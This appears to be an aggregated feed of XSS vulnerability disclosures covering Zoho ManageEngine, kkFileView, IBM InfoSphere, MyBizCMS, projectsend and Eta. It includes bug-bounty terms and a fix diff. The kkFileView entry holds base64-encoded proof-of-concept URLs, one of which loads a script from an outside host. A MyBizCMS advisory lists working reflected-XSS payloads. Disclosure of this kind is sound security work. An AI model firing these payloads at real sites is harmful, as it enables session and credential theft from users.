Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via PO in the purchase component.

Zoho offers this Vulnerability Reward Program (VRP) to continuously improve the security of our products. If you believe you have discovered a potential security vulnerability in any of Zoho's products or assets, let us know immediately, and we will make every effort to get the issues addressed as quickly as possible.

Please ensure you understand the program rules before you report a vulnerability. By participating in this program, you agree to be bound by these rules. Zoho provides monetary rewards to vulnerability reporters at its discretion and the reward may vary based upon metrics including (but not limited to) vulnerability severity, impact, and exploitability.

You can share details of the suspected vulnerability with Zoho by clicking below;

Submit Bug

These Bug Bounty Terms and Conditions ("Bug Bounty Terms") govern your participation in the Zoho Bug Bounty Program ("Bug Bounty Program") and are a legally binding contract between you or the company you represent and Zoho. By submitting a vulnerability or participating in the program, you agree to be bound by the Terms.

The Bug Bounty Program enables you to submit security bugs or vulnerabilities discovered by you in eligible Zoho Services and earn rewards for your submissions. Service-specific terms of use that are applicable to specific Zoho Services ("Service-Specific Terms") shall be applicable to you in addition to the Bug Bounty Terms. In the event of a conflict between Bug Bounty Terms and Service-specific Terms, the Bug Bounty Terms shall prevail.

Participation in the Bug Bounty Program is open to all individuals unless:

*   You are below 14 years of age. If you are 14 years old or above, but you are considered a minor in your place of residence, you must obtain your parent's or legal guardian's permission prior to your participation in the Bug Bounty Program after having read the Bug Bounty Terms;
    
*   You are a resident of any US sanctioned countries;
    
*   You are currently an employee of Zoho or you were employed by Zoho within six (6) months prior to your participation in the Bug Bounty Program; or
    
*   You are a family member of a Zoho employee.
    

You will follow the rules specified hereunder, failing which your participation in the Bug Bounty Program will be immediately terminated.

*   You will make all efforts to avoid privacy violations, degradation of user experience, degradation of Zoho Services, disruptions to Zoho's infrastructure and systems, and destruction of both Zoho's and users' data in the course of your security bug research.
    
*   You will report any security bug discovered by you ("Security Bug") to Zoho and provide Zoho with reasonable time to identify and mitigate the security bug before publicly disclosing it to others.
    
*   During your security bug research, if you have any inadvertent access to Zoho's or users' information, including sensitive, personal, or any other unauthorized information ("Unauthorized Information"), you must cease your Security Bug research to prevent further access to any Unauthorized Information by you and notify Zoho of any Unauthorized Information you accessed. Upon notifying Zoho of such access, delete all Unauthorized Information from your systems or devices.
    
*   You will always use your account, or an account for which you have explicit consent from the account owner, for testing the Security Bug.
    
*   You will use any security bug discovered by you only for testing, and you will not exploit the Security Bug in any manner.
    

If you have discovered an eligible security bug as specified in the scope, you may submit the bug through the website provided to you for submission.

Your submission shall include details such as vulnerability description, clear reproduction steps, and a proof-of-concept.

Upon receipt of your submission, Zoho will review and validate the submission within three (3) days from the date of your submission and will prioritize based on the severity of the vulnerability submitted and resolve the vulnerability accordingly. Zoho will notify you once the vulnerability is resolved and you may confirm whether the remedy resolves the vulnerability. If there is more than one submission for the same vulnerability from different parties, bounty will be paid to the first submission.

Zoho will pay a reward for your eligible submissions ("Bounty"). Bounties will be determined and granted only at Zoho's discretion. You can find the reward tiers here.

Zoho will fulfill the Bounty payments through the following payment modes:

*   For Indian participants, in INR through wire transfer;
    
*   For participants from outside India, in USD through PayPal; or
    
*   As an Amazon gift card in USD.
    

You understand that you are responsible for paying the taxes associated with Bounty payments. Bounties for Indian participants will be paid only after deducting TDS of 10% (Tax Deducted at Source).

Bounties shall be claimed by you within a period of three (3) months from the date of your entitlement to the reward.

You grant Zoho non-exclusive, irrevocable, worldwide, perpetual, and royalty-free license to review, assess, and use your submission to analyze and resolve the vulnerability submitted by you and for other related purposes.

ZOHO SHALL IN NO EVENT BE LIABLE FOR ANY CONSEQUENTIAL, INCIDENTAL, INDIRECT, SPECIAL, PUNITIVE, OR OTHER LOSS OR DAMAGE WHATSOEVER OR FOR LOSS OF BUSINESS PROFITS, BUSINESS INTERRUPTION, COMPUTER FAILURE, LOSS OF BUSINESS INFORMATION, OR OTHER LOSS ARISING OUT OF THE BUG BOUNTY PROGRAM.

*   All Zoho branded products and applications listed at zoho.com
    
*   All ManageEngine branded products and applications listed at manageengine.com (except SupportCenter Plus)
    
*   Site24x7
    
*   Qntrl
    
*   TrainerCentral
    
*   Zoho Corporation owned assets
    

*   Missing any best security practice that is not a vulnerability
    
*   Self XSS
    
*   Username or email address enumeration
    
*   Email bombing
    
*   HTML injection
    
*   XSS vulnerabilities on sandbox or user-content domains
    
*   Unvalidated or open redirects or tabnabbing
    
*   Clickjacking in unauthenticated pages or in pages with no significant state-changing action
    
*   Logout or unauthenticated CSRF
    
*   Missing cookie flags on non-sensitive cookies
    
*   Missing security headers that do not lead directly to a vulnerability
    
*   Unvalidated findings from automated tools or scans
    
*   "Back" button that keeps working after logout
    
*   Issues that do not affect the latest version of modern browsers or platforms
    
*   Attacks that require physical access to a user device
    
*   Social engineering
    
*   Hosting malware/arbitrary content on Zoho and causing downloads
    
*   Use of a known-vulnerable library (without evidence of exploitability)
    
*   Low-impact descriptive error pages and information disclosures without any sensitive information
    
*   Invalid or missing SPF/DKIM/DMARC/BIMI records
    
*   Password and account policies, such as (but not limited to) reset link expiration or password complexity
    
*   Non-critical issues in blog.zoho.com or other product blogs
    
*   CSV injection
    
*   Phishing risk via Unicode/Punycode or RTLO issues
    
*   Missing rate limitations on endpoints (without any security concerns)
    
*   Presence of EXIF information in file uploads
    
*   Ability to upload/download executables
    
*   Bypassing pricing/paid feature restrictions
    
*   0-day vulnerabilities in any third parties we use within 10 days of their disclosure
    
*   Any other issues determined to be of low or negligible security impact
    
*   Issues that do not affect the latest version of applications, modern browsers, or platforms
    
*   Vulnerabilities that resulted from implementation that does not follow our deployment guidelines
    
*   Usage of known vulnerable components without actual working exploit
    
*   Our intended features or accepted risks (including but not limited to the following) are not vulnerabilities and are thus excluded from our program:
    
*   Applications running as SYSTEM user
    
*   Features to execute queries, scripts, or workflows by privileged users
    
*   Usage of UDP-based unauthenticated protocols (which can be disabled by the user)
    

Severity

Bounty in USD (Up to)

Low

$ 50

Medium

$ 200

High

$ 800

Critical

$ 3000

We would like to truly thank the people listed in the Hall of Fame for their participation in the program and for making a responsible disclosure of the vulnerabilities.

Hall Of Fame for

CVE-2023-23073: BugBounty

kkFileView v4.1.0 was discovered to contain a cross-site scripting (XSS) vulnerability via the url parameter at /controller/OnlinePreviewController.java.

问题描述Description

kkFileview v4.1.0存在XSS漏洞，可能导致网站cookies泄露和iframe SSRF。

kkFileview v4.1.0 has an XSS vulnerability, which may lead to the leakage of website cookies and iframe SSRF.

漏洞位置vulerable code location

kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java文件59行，"url"参数用户可控，且没有过滤特殊字符就输出到了页面

The vulnerability code is located at line 59 in kkFileView/server/src/main/java/cn/keking/web/controller/OnlinePreviewController.java , The 'url' parameter is user-controllable, and it is output to the page without filtering special characters

@GetMapping( "/onlinePreview")  
public String onlinePreview(String url, Model model, HttpServletRequest req) {  
String fileUrl;  
try {  
fileUrl = WebUtils.decodeUrl(url);  
} catch (Exception ex) {  
String errorMsg = String.format(BASE64\_DECODE\_ERROR\_MSG, "url");  
return otherFilePreview.notSupportedFile(model, errorMsg);  
}  
FileAttribute fileAttribute = fileHandlerService.getFileAttribute(fileUrl, req);  
model.addAttribute("file", fileAttribute);  
FilePreview filePreview = previewFactory.get(fileAttribute);  
logger.info("预览文件url：{}，previewType：{}", fileUrl, fileAttribute.getType());  
return filePreview.filePreviewHandle(fileUrl, model, fileAttribute);  
}

漏洞证明PoC

官方演示站点为最新4.1.0版本，以此为演示，访问漏洞位置（url参数值需要经过base64编码）:  
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw==  
  
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=  

The official demo site is the latest version 4.1.0. Take this as a demo to access the vulnerability location (the URL parameter value needs to be Base64 encoded and URL encoded):  
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PHNjcmlwdC9zcmM9aHR0cHM6Ly94c3Mucm9ja3MveHNzLmpzPi90ZXN0LnBuZw==  
https://file.keking.cn/onlinePreview?url=aHR0cDovLyI+PGlmcmFtZS9zcmM9aHR0cHM6Ly91YXQtazhzLmtla2luZy5jbi8gaGVpZ2h0PTEwMDAgd2lkdGg9MTAwMD4vdGVzdC5wbmc=

CVE-2022-46934: kkFileView XSS Vulnerability · Issue #411 · kekingcn/kkFileView

Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 14 via the comment field when changing the credentials in the Assets.

CVE-2023-23078: BugBounty

Cross site scripting (XSS) vulnerability in Zoho ManageEngine ServiceDesk Plus 13 via the comment field when adding a new status comment.

CVE-2023-23077: BugBounty

OS Command injection vulnerability in Support Center Plus 11 via Executor in Action when creating new schedules.

CVE-2023-23076: BugBounty

IBM InfoSphere Information Server 11.7 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 243161.

  

**Summary**

A cross-site scripting vulnerability in InfoSphere Information Server was addressed.

**Vulnerability Details**

**CVEID:**   CVE-2022-47983  
**DESCRIPTION:**   IBM InfoSphere Information Server is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 5.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/243161 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)

**Affected Products and Versions**

Affected Product(s)

Version(s)

InfoSphere Information Server

11.7

  

**Remediation/Fixes**

**Workarounds and Mitigations**

None

**References**

Off

**Change History**

26 Jan 2023: Initial Publication

\*The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.

**Disclaimer**

According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an "industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response." IBM PROVIDES THE CVSS SCORES ""AS IS"" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY. In addition to other efforts to address potential vulnerabilities, IBM periodically updates the record of components contained in our product offerings. As part of that effort, if IBM identifies previously unidentified packages in a product/service inventory, we address relevant vulnerabilities regardless of CVE date. Inclusion of an older CVEID does not demonstrate that the referenced product has been used by IBM since that date, nor that IBM was aware of a vulnerability as of that date. We are making clients aware of relevant vulnerabilities as we become aware of them. "Affected Products and Versions" referenced in IBM Security Bulletins are intended to be only products and versions that are supported by IBM and have not passed their end-of-support or warranty date. Thus, failure to reference unsupported or extended-support products and versions in this Security Bulletin does not constitute a determination by IBM that they are unaffected by the vulnerability. Reference to one or more unsupported versions in this Security Bulletin shall not create an obligation for IBM to provide fixes for any unsupported or extended-support products or versions.

**Document Location**

Worldwide

\[{"Business Unit":{"code":"BU059","label":"IBM Software w\\/o TPS"},"Product":{"code":"SSZJPZ","label":"IBM InfoSphere Information Server"},"Component":"","Platform":\[{"code":"PF016","label":"Linux"},{"code":"PF033","label":"Windows"},{"code":"PF002","label":"AIX"}\],"Version":"11.7","Edition":"","Line of Business":{"code":"LOB10","label":"Data and AI"}}\]

CVE-2022-47983: Security Bulletin: IBM InfoSphere Information Server is vulnerable to cross-site scripting (CVE-2022-47983)

eCommerce Marketplace Platform CMS version 1.7 suffers from a cross site scripting vulnerability.

    ┌┌───────────────────────────────────────────────────────────────────────────────────────┐││                                     C r a C k E r                                    ┌┘┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                  [ Vulnerability ]                                   ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:  Author   : CraCkEr                                                                    :│  Website  : mybizcms.com                                                               ││  Vendor   : MyBizCMS                                                                   ││  Software : Emporium Multi-Vendor - eCommerce Marketplace Platform CMS 1.7             ││  Vuln Type: Reflected XSS                                                              ││  Impact   : Manipulate the content of the site                                         ││                                                                                        ││────────────────────────────────────────────────────────────────────────────────────────││                                                                                       ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘:                                                                                        :│  Release Notes:                                                                        ││  ═════════════                                                                         ││  The attacker can send to victim a link containing a malicious URL in an email or      ││  instant message can perform a wide variety of actions, such as stealing the victim's  ││  session token or login credentials                                                    ││                                                                                        │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                                                                      ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets:    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/0x0CryptoJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /searchGET parameter 'pg' is vulnerable to XSS/search?q=&pg=2vo1rf%3cscript%3ealert(1)%3c%2fscript%3ew6fsgPath: /categories/phonesGET parameter 'max_price' is vulnerable to XSS/categories/phones?min_price=2485&max_price=fulkc"><script>alert(1)</script>hpbwmPath: /categories/phonesGET parameter 'min_price' is vulnerable to XSS/categories/phones?min_price=2485i95td%22%3e%3cscript%3ealert(1)%3c%2fscript%3erziag[-] Done

eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting

Cross-site Scripting (XSS) - DOM in GitHub repository microweber/microweber prior to 1.3.2.

**Microweber contains Cross-site Scripting**

Moderate severity GitHub Reviewed Published Feb 1, 2023 to the GitHub Advisory Database • Updated Feb 2, 2023

GHSA-pj97-r83v-vj7f: Microweber contains Cross-site Scripting

Cross-site Scripting (XSS) - Stored in GitHub repository projectsend/projectsend prior to r1606.

@@ -10,10 +10,17 @@

$active\_nav = 'templates';

include\_once ADMIN\_VIEWS\_DIR . DS . 'header.php';

  

$templates = look\_for\_templates();

$valid\_templates = array\_map(function($t) { return $t\['location'\]; }, $templates);

  

/\*\*

\* Changing the client's template

\*/

if (isset($\_GET\['activate\_template'\])) {

if (!in\_array($\_GET\['activate\_template'\], $valid\_templates)) {

exit\_with\_error\_code(403);

}

  

$save = save\_option('selected\_clients\_template', $\_GET\['activate\_template'\]);

  

global $flash;

@@ -28,8 +35,6 @@

  

ps\_redirect(BASE\_URI . 'templates.php');

}

  

$templates = look\_for\_templates();

?>

<div class\="row"\>

<div class\="col-12 col-sm-12 col-lg-12"\>

CVE-2023-0607: Fix XSS when changing template · projectsend/projectsend@698be4a

Eta is an embedded JS templating engine that works inside Node, Deno, and the browser. XSS attack - anyone using the Express API is impacted. The problem has been resolved. Users should upgrade to version 2.0.0. As a workaround, don't pass user supplied things directly to `res.render`.

**TL;DR**

This commit includes fixes for several security vulnerabilities. Specifically, in version 1, Eta merged the data parameter of renderFile() into config -- meaning that malicious untrusted user data, passed through in a very specific way, could potentially modify the values of varName, include, includeFile, and useWith, and thus insert arbitrary code into user template functions.

With this release, such behavior is removed. Configuration cannot be passed through the data parameter to eta.renderFile().

Most users will be able to update from version 1 to version 2 without changing any code. All users are encouraged to update as soon as possible.

**Practical Implications**

*   Configuration must be passed to renderFile explicitly, rather than merged with the data parameter
*   Using Express.js app.set() to modify views and view cache will no longer change Eta's configuration of views and cache.
    *   However, since Express still uses its own views and view cache options under the hood, users should configure both Eta and Express with desired values (example below)
*   Eta no longer recognizes the legacy Express.js settings["view options"] property

**Example Code Changes**

// Change THIS:
renderFile(filePath, { cache: true }) // This worked in v1 but does not work in v2
// To THIS:
renderFile(filePath, {}, { cache: true }) // This works in v1 and v2

// Change THIS:
var eta \= require("eta")
app.set("view engine", "eta")
app.set("views", "./views")
app.set("view cache", true)
// To THIS:
var eta \= require("eta")
app.engine("eta", eta.renderFile)
eta.configure({  views: "./views", cache: true }) // configure eta
app.set("views", "./views") // configure Express
app.set("view cache", true) // configure Express
app.set("view engine", "eta")

**Commits**

*   Don't use data object for Eta configuration (#214) 5651392

v1.14.2...v2.0.0

Tag

#xss